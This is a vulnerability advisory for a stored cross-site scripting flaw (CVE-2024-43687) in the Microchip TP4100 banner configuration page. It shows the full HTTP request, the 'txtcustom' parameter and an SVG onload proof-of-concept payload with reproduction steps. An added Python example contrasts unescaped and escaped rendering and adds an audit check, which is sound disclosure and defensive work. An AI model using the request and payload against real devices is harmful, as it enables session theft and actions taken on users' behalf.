
CVE-2024-43687 – Microchip TP4100

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79

Software Version: 2.3.12

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687

CVSS: 6.1

Severity: Medium

Credits: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

The field "Custom Banner" in the tab "Banner config" has been found vulnerable to stored cross-site scripting (XSS). The injected script is executed by the browser when a user visits the banner page. This type of XSS is particularly dangerous because the malicious code is saved by the device and is executed for any user that loads the page, until the device is reset.


Step-by-step instructions and PoC

An authenticated user of the web application can insert JavaScript code into the banner configuration.

Affected Endpoints

• URL: http://<device_IP>/bannerconfig

• HTTP Parameter: txtcustom

Below is the evidence, with the vulnerability details and the payload used.

Payload used to exploit the vulnerability:

POST /bannerconfig HTTP/1.1
Host: <device_IP>
Cookie: ci_session=2e5d6db87cf9104d4b8bfd4951665c2b96fffc24
Content-Length: 477
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://<device_IP>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryayaMItq0sXj5hiI2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://<device_IP>/bannerconfig
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="user_level"

1
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="txtcustom"

<svg onload=alert(1000000)>
------WebKitFormBoundaryayaMItq0sXj5hiI2
Content-Disposition: form-data; name="action"

applybanner
------WebKitFormBoundaryayaMItq0sXj5hiI2--

After logging in, go to the ‘Admin’ -> ‘Banner Config’ panel. Select ‘Custom Banner’ and insert the following JavaScript payload:

        <svg onload=alert(1000000)>

Figure 7: Add JavaScript payload

Then click ‘Apply’. Finally, the JavaScript code is executed in the banner page at ‘https://<device_IP>’.

Figure 8: Stored Cross-site Scripting

Security Impact

By using malicious JavaScript code, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker could transfer private information from the victim's machine to the attacker, or send malicious requests to a web site on behalf of the victim.
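The root cause is CWE-79: the stored "txtcustom" value is written into the banner page as raw HTML instead of as text. The following Python example is added here to illustrate the fix and a configuration check; it is not code from the advisory or from the Microchip TP4100 firmware, and the page template, function names and the benign sample banner are constructed for the illustration. It places the vulnerable rendering pattern beside the hardened one (entity-encoding the stored value at output time) and adds an audit routine that parses a stored banner value and reports any markup or event-handler attribute it contains, which is useful for checking banners already stored on a device.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs: the payload from the advisory and a benign banner.
POC_PAYLOAD = "<svg onload=alert(1000000)>"
BENIGN_BANNER = "Authorized access only. Sessions are logged & monitored."

# Hypothetical page template standing in for the device's banner page.
PAGE_TEMPLATE = '<html><body><div id="banner">{banner}</div></body></html>'


def render_banner_vulnerable(custom_text: str) -> str:
    """Insert the stored banner value into the page as raw HTML.

    This mirrors the defect described in the advisory: the stored string is
    handed to the browser as markup, so a tag with an event-handler attribute
    executes for every user who loads the page.
    """
    return PAGE_TEMPLATE.format(banner=custom_text)


def render_banner_hardened(custom_text: str) -> str:
    """Insert the stored banner value as text.

    html.escape encodes <, >, &, " and ' as entities, so the browser displays
    the banner verbatim instead of parsing it. Encoding at output time is the
    CWE-79 fix; input filtering alone is not sufficient.
    """
    return PAGE_TEMPLATE.format(banner=html.escape(custom_text, quote=True))


class _MarkupDetector(HTMLParser):
    """Records every tag and every on* attribute seen while parsing a string."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.event_handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _value in attrs:
            if name and name.lower().startswith("on"):
                self.event_handlers.append(name.lower())

    def handle_startendtag(self, tag, attrs):
        # Self-closing form (<svg .../>) is treated like an ordinary start tag.
        self.handle_starttag(tag, attrs)


def audit_banner_value(stored_value: str) -> dict:
    """Classify a stored banner value.

    A legitimate banner is plain text, so any tag at all is suspicious and an
    on* attribute is a strong indicator of a stored XSS payload.
    """
    detector = _MarkupDetector()
    detector.feed(stored_value)
    detector.close()
    return {
        "contains_markup": bool(detector.tags),
        "tags": detector.tags,
        "event_handlers": detector.event_handlers,
    }


if __name__ == "__main__":
    print("vulnerable:", render_banner_vulnerable(POC_PAYLOAD))
    print("hardened:  ", render_banner_hardened(POC_PAYLOAD))
    print("audit PoC: ", audit_banner_value(POC_PAYLOAD))
    print("audit ok:  ", audit_banner_value(BENIGN_BANNER))
```

Running the script shows the payload surviving intact in the vulnerable output and appearing as `&lt;svg onload=alert(1000000)&gt;` in the hardened output; the audit flags the stored payload (tag `svg`, handler `onload`) while passing the benign banner, including its bare ampersand.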